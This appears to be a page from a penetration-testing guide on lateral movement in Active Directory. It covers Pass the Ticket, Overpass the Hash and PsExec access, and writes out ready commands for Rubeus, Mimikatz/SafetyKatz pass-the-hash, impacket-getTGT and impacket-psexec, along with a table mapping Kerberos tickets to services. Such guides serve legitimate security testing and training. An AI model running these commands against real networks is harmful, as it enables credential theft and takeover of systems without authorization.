# Lateral Movement

## Introduction

In this section, you will find some techniques in order to perform lateral movements on **Active Directory** infrastructuree.

## Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.

You can perform this technique with **Rubeus**.

```bash
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
```

Depending on the obtained TGS you, will only be able to perform specific tasks.

### Tickets - Techniques

| Service Type                               | Required Tickets                                          |
| ------------------------------------------ | --------------------------------------------------------- |
| Windows File Share (PsExec)                | CIFS                                                      |
| LDAP Operations (DSync)                    | LDAP                                                      |
| WinRM                                      | <p>HOST<br>HTTP<br>WINRM</p>                              |
| WMI                                        | <p>HOST<br>RPCSS</p>                                      |
| Powershell Remoting                        | <p>HOST<br>HTTP<br>Depending on OS:<br>WSMAN<br>RPCSS</p> |
| Schedule Taks                              | Host                                                      |
| Windows Remote Server Administration Tools | <p>RPCSS<br>LDAP<br>CIFS</p>                              |
| Golden Tickets                             | krbtgt                                                    |

## Overpass The Hash (OTH)

This technique allows a user to request a Kerberos TGT using its NTLM or AES/RC4 hash.

* **Alternative 1 - Without HIGH privileges**

<pre class="language-bash"><code class="lang-bash"><strong># Alternative 1
</strong><strong>.\Rubeus.exe asktgt /nowrap /user:&#x3C;USER> [/dc:&#x3C;DC_IP>] [/ntlm:&#x3C;HASH_NTLM>|/aes256:&#x3C;AES256_KEY>|/rc4:&#x3C;RC4_KEY>] [/opsec|/force] /ptt 
</strong><strong># Alternative 2
</strong>impacket-getTGT &#x3C;DOMAIN>/&#x3C;USERSNAME>[:password] -dc-ip &#x3C;DC_IP> -hashes LMHASH:NTHASH
</code></pre>

* Alterntative 2 - Requires HIGH privileges

```bash
[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"
```

Then, you can use PsExec to access the machine, if the user has administrator privileges.

> :information\_source:The `-s` argument is to upgrade to "nt authority\system", but it will only work if you are going to connect as a highly privileged user.

```bash
# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]
```

## S4U2Self Abuse (Constrained Delegation)

The exploitation is seen on the [Kerberos exploitation phase](https://the-pentesting-guide.marmeus.com/active-directory/kerberos#s4u2self-abuse).

## Alternate Service Name (Constrained Delegation)

The exploitation is seen on the [Kerberos exploitation phase](https://the-pentesting-guide.marmeus.com/active-directory/kerberos#alternate-service-name).

## References

* [Attacking Kerberos: Constrained Delegation](https://www.notsoshant.io/blog/attacking-kerberos-constrained-delegation/)